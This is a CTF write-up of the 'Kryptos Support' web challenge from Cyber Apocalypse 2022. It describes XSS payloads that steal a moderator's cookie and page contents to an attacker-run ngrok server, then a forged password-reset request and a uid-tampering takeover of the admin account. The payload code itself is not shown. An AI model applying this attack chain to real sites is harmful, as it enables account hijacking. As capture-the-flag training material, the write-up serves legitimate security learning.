Cyber Apocalypse 2022 — Kryptos Support
This challenge was in the “Web” category of Cyber Apocalypse CTF and has the following description:
The landing page shows an input box, for reporting an issue:
The web app also have a functionality to login. So at that point I have thought about XSS and that is what I have tried to exploit.
First I have started a HTTP Server on port 8000 and started Ngrok to make that web server accessable from the Internet.
First I have created a payload to retrive the cookie:
Next I have created a payload to retrieve the contents of the web page, which the user is looking at:
And I have received the cookie and the contents of the cookie:
The cookie was in JWT format and I was able to decode it with a JWT decoder:
It showed that the username is “moderator”. But I was not able to use that cookie to login as moderator. So I had to try another way in.
In HTML code of the web page showed me that there is a settings-page at /settings.
Tampering with the settings page
Now I have created a third payload to retrieve the settings page in base64 encoded format:
The payload will send me the base64 encoded string a GET parameter called “settings” to my web server. After waiting for a bit, I was able to retrieve the content:
The decoded code:
As you can see it contains a form to reset the password. There is also a settings.js file located at /static/js/settings.js, which could be requested without authentication:
It sends JSON data with new password and uid to the endpoint /api/users/update via POST to reset the password. So I have implemented the same functionality to reset the moderator’s password to “Password123”:
After waiting for the request to my web server, I have used the credentials moderator:Password123 to login to the web page:
Unfortunatly this was not enough to get the flag. So I have navigated to the settings page and intercepted a password reset request:
As you can see the request also contains the uid. So I have send that request to the Repeater to test other UIDs. I have started with 0, but it was not successfull. With UID 1 I was able to reset admin’s password and then login with admin:Password123 to retrieve the flag: